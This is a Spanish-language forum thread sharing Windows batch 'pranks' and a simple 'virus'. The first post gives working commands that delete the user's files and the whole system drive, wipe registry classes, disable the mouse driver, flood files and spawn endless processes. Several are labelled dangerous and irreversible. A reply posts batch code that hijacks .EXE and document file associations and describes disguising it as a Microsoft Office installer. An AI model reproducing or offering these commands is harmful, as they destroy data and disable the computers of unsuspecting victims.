[BATCH] Pranks

Iniciado por 79137913, Junio 04, 2018, 11:53:44 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Junio 04, 2018, 11:53:44 AM Ultima modificación: Junio 05, 2018, 09:06:04 PM por Gabriela
HOLA!!!

Les dejo una lista de Pranks (bromas pesadas) en BATCH:

1 Deshabilitar Mouse:
Código: dos
set key="HKEYLOCALMACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4_


2 Invertir Mouse:
Código: bash
Rundll32 user32,SwapMouseButton


3 Eliminar toda la carpeta del usuario que corre el script: [PELIGROSO, SIN ARREGLO]
Código: dos
del /f /q "C:\Users\%userprofile%\*.*"


4 Cambiar hora de la pc:
Código: dos
time 00:00


5 File Flood:
Código: dos
:start
echo Hola >>%random%.txt
goto start


6 Romper PC: [PELIGROSO, SIN ARREGLO]
Código: dos
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00


7 Error sos muy tonto, el sitstema se reiniciara para ver si no estas cuando vuelva:
Código: dos
msg * Error Fatal debido a la idiotez del usuario actual!
shutdown -c "Error! sos muy tonto, el sitstema se apagará para ver si no estás cuando vuelva!" -s -t 10


8 Destruir registro: [PELIGROSO, SIN ARREGLO]
Código: dos
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MSGX
ECHO Tu pc ha sido destruida, que tengas un gran dia!
GOTO MSGX


9 Ram Overflow con notepads:
Código: dos
:nuevo
START %SystemRoot%\system32\notepad.exe
GOTO nuevo


GRACIAS POR LEER!!!
"Algunos creen que soy un bot, puede que tengan razon"
"Como no se puede igualar a Dios, ya he decidido que hacer, ¡SUPERARLO!"
"La peor de las ignorancias es no saber corregirlas"

*Shadow Scouts Team*                                                No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Junio 05, 2018, 08:27:59 PM #1 Ultima modificación: Abril 20, 2019, 10:33:44 AM por Aincrad
UMM INTERESANTE. YO Hice un virus simple que confunde los formatos por medio del registro. la cual causaba q no pudieras correr ningún formato .msi .exe .mp4 . no corría nada ni siquiera el administrador de tareas , ni siquiera el antivirus. bueno probé varios y el único que lo detectaba es el 360 total security realmente es el mejor antivirus q he probado aparte de DR,Web antivirus.

eliminen ese avast , avg , o panda son antivirus Basura.

Para Windows les recomiendo :

360 total security

Para android el mejor antivirus que he encontrado es (puede eliminar esos 50 virus de mi android , he incleso ese maldi** virus llamado Netalpha):

DR,Web antivirus




Bueno me desvíe del tema al que me refería :V . Bueno el virus del que hablaba es este:

Source code (ATENCION :  este virus puede llegar a ser peligroso , si le ponen una linea debilitando el registro y otra linea confundiendo los formatos .bat y otros formatos de ejecución puede a llegar a ser peligroso. (sin reparacion) ):

Código: dos
@echo off
reg add HKCU\Software\Classes\.VBS /d "htafile" /f
reg add HKCU\Software\Classes\.docx /d "htafile" /f
reg add HKCU\Software\Classes\.pdf /d "htafile" /f
reg add HKCU\Software\Classes\.doc /d "htafile" /f
reg add HKCU\Software\Classes\.mp3 /d "htafile" /f
reg add HKCU\Software\Classes\.mp4 /d "htafile" /f
reg add HKCU\Software\Classes\.EXE /d "htafile" /f
exit


Bueno el virus lo copile y lo disfrace  de Microsoft Ofice 2007 Installer y lo que paso fue que al subirlo al virustotal o a Hibrid Analizis me lo detectaron como RAMSOMWARE Pueden creerlo un simple scrip Batch detectado como ramsomware. "REALMENTE ME CAGUE DE LA RISA  ;D "

Para que vean que no miento (la primera vez que lo subí solo lo detectaban unos 4 de 64 ) :

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta




Algunas imágenes después de abrir el virus :

Intentando abrir el navegador : (Ojo todos los formatos que confundas se abrirán así )








Bueno ahora Viene la solución a esta virus osea el Parche . (No crean que me voy a auto-joder con mi propia creación)

Código: dos
parche removido


Bueno cuando abran el Parche les pedirá una contraseña que es : 2111995 , Como ven el Ofusque el codigo fuente del Parche con la herramienta BatchCrypt , Perdon por no proporcionar el codigo desofuscado pero lo perdi y me da flojera ponerme a desofuscarlo . :v  :P